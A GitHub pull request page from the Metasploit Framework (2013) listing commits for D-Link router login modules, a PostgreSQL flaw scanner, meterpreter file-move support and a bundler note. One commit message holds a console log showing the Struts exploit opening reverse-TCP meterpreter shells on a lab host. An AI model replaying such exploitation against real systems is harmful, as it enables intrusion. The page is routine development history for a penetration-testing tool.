Adding a note to HACKING #1

Merged
merged 40 commits into from

5 participants

@todb-r7

Leaves instructions on how to bundle install.

Meatballs1 and others added some commits
@Meatballs1 Meatballs1 Add calling conv to railgun a9bf09a
@Meatballs1 Meatballs1 Change to wldap to allow cdecl a6fea39
@Meatballs1 Meatballs1 msftidy a980419
@Meatballs1 Meatballs1 Fixup wldap32 mistakes 595cace
RageLtMan Add Framework side of stdapi.fs.file.mv
Add the appropriate methods to Rex side of the FS extension and
the commensurate command dispatcher.

Requires rapid7/meterpreter#6 from the
meterpreter repo as well as compiling fresh DLL for
ext_server_stdapi.
d399093
m-1-k-3 dlink dir 300/600 login module - initial commit e574981
m-1-k-3 user fix c4fe218
m-1-k-3 http login module for DLink DIR300revB, DIR600revB, DIR815 e1a719a
m-1-k-3 default to user admin 032214f
m-1-k-3 default to user admin 680b551
m-1-k-3 Dlink DIR615 HW rev B login module 615aa57
m-1-k-3 DIR-645 also working aa981cc
m-1-k-3 feedback included, server header check b6a50da
m-1-k-3 feedback included, server header check 2b4d6eb
m-1-k-3 feedback included, server fingerprinting 1156194
m-1-k-3 report_auth_info - proof 8032a33
jvazquez-r7 cleanup for dlink_dir_300_615_http_login 89de9fd
@m-1-k-3 m-1-k-3 Merge pull request #6 from jvazquez-r7/dlink_dir_300_615_http_login_work
tested and working. pcap follows
1344fa8
m-1-k-3 is_dlink and some more feedback included 64f3e68
m-1-k-3 is_dlink, more feedback included 2f96a67
m-1-k-3 is_dlink, more feedback included, msftidy 78c492d
m-1-k-3 make msftidy happy 7b4cdf4
HD Moore Add scanner module for the new PostgreSQL flaw c8a6dfb
HD Moore Add the advisory URL fe2b598
@todb todb Landing #1702, hdmoore's postgres scanner cb87439
jvazquez-r7 Merge branch 'dlink_login' of https://github.com/m-1-k-3/metasploit-f…
…ramework into m-1-k-3-dlink_login
cff70e4
jvazquez-r7 final cleanup for dlink_dir_300_615_http_login 498a0dc
jvazquez-r7 Merge branch 'dlink_login_dir_300B_600B' of https://github.com/m-1-k-…
…3/metasploit-framework into m-1-k-3-dlink_login_dir_300B_600B
6ec6638
jvazquez-r7 module filename changed 0b9fe53
jvazquez-r7 final cleanup for dlink_dir_session_cgi_http_login 7d1e9af
jvazquez-r7 Merge branch 'dlink_login_dir_615H' of https://github.com/m-1-k-3/met…
…asploit-framework into m-1-k-3-dlink_login_dir_615H
8f60d12
jvazquez-r7 final cleanup for dlink_dir_615h_http_login 30f44c3
James Lee Latest meterpreter bins 2d47be4
James Lee Landing #1463, Meatballs' cdecl fixes ad46b46
James Lee Bins for new stdapi_fs_file_move command ab0535b
James Lee Landing #1579, meterpreter mv
See rapid7/meterpreter/#6
0671406
James Lee Add a test for stdapi_fs_file_move
Also disables tests for sniffer, which is crashy.
7cf6918
James Lee Make msftidy shut up
How did those pesky CRs get in there in the first place?
7fbe477
@todb todb Merges #1706, removing gemcache per brandont
This has been put off for a long while.
bbce538
@todb todb Adding bundler step to HACKING 392ffce
@bturner-r7 bturner-r7 merged commit 392ffce into bturner-r7:remove-gemcache
@bturner-r7 bturner-r7 pushed a commit that referenced this pull request
@Console Console Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
ab6a2a0
Commits on Feb 8, 2013
  1. @Meatballs1

    Add calling conv to railgun

    Meatballs1 committed
  2. @Meatballs1
  3. @Meatballs1

    msftidy

    Meatballs1 committed
  4. @Meatballs1

    Fixup wldap32 mistakes

    Meatballs1 committed
Commits on Mar 12, 2013
  1. Add Framework side of stdapi.fs.file.mv

    RageLtMan committed
    Add the appropriate methods to Rex side of the FS extension and
    the commensurate command dispatcher.
    
    Requires rapid7/meterpreter#6 from the
    meterpreter repo as well as compiling fresh DLL for
    ext_server_stdapi.
Commits on Mar 25, 2013
  1. dlink dir 300/600 login module - initial commit

    m-1-k-3 committed
Commits on Mar 26, 2013
  1. user fix

    m-1-k-3 committed
Commits on Mar 27, 2013
  1. default to user admin

    m-1-k-3 committed
  2. default to user admin

    m-1-k-3 committed
  3. Dlink DIR615 HW rev B login module

    m-1-k-3 committed
  4. DIR-645 also working

    m-1-k-3 committed
Commits on Mar 29, 2013
  1. feedback included, server header check

    m-1-k-3 committed
  2. feedback included, server header check

    m-1-k-3 committed
  3. feedback included, server fingerprinting

    m-1-k-3 committed
  4. report_auth_info - proof

    m-1-k-3 committed
Commits on Apr 3, 2013
  1. cleanup for dlink_dir_300_615_http_login

    jvazquez-r7 committed
Commits on Apr 4, 2013
  1. @m-1-k-3

    Merge pull request #6 from jvazquez-r7/dlink_dir_300_615_http_login_work

    m-1-k-3 committed
    tested and working. pcap follows
  2. is_dlink and some more feedback included

    m-1-k-3 committed
  3. is_dlink, more feedback included

    m-1-k-3 committed
  4. is_dlink, more feedback included, msftidy

    m-1-k-3 committed
  5. make msftidy happy

    m-1-k-3 committed
  6. Add scanner module for the new PostgreSQL flaw

    HD Moore committed
  7. Add the advisory URL

    HD Moore committed
  8. @todb
  9. Merge branch 'dlink_login' of https://github.com/m-1-k-3/metasploit-f…

    jvazquez-r7 committed
    …ramework into m-1-k-3-dlink_login
  10. final cleanup for dlink_dir_300_615_http_login

    jvazquez-r7 committed
  11. Merge branch 'dlink_login_dir_300B_600B' of https://github.com/m-1-k-…

    jvazquez-r7 committed
    …3/metasploit-framework into m-1-k-3-dlink_login_dir_300B_600B
  12. module filename changed

    jvazquez-r7 committed
  13. final cleanup for dlink_dir_session_cgi_http_login

    jvazquez-r7 committed
  14. Merge branch 'dlink_login_dir_615H' of https://github.com/m-1-k-3/met…

    jvazquez-r7 committed
    …asploit-framework into m-1-k-3-dlink_login_dir_615H
  15. final cleanup for dlink_dir_615h_http_login

    jvazquez-r7 committed
Commits on Apr 5, 2013
  1. Latest meterpreter bins

    James Lee committed
  2. Landing #1463, Meatballs' cdecl fixes

    James Lee committed
  3. Landing #1579, meterpreter mv

    James Lee committed
    See rapid7/meterpreter/#6
  4. Add a test for stdapi_fs_file_move

    James Lee committed
    Also disables tests for sniffer, which is crashy.
  5. Make msftidy shut up

    James Lee committed
    How did those pesky CRs get in there in the first place?
  6. @todb

    Merges #1706, removing gemcache per brandont

    todb committed
    This has been put off for a long while.
  7. @todb

    Adding bundler step to HACKING

    todb committed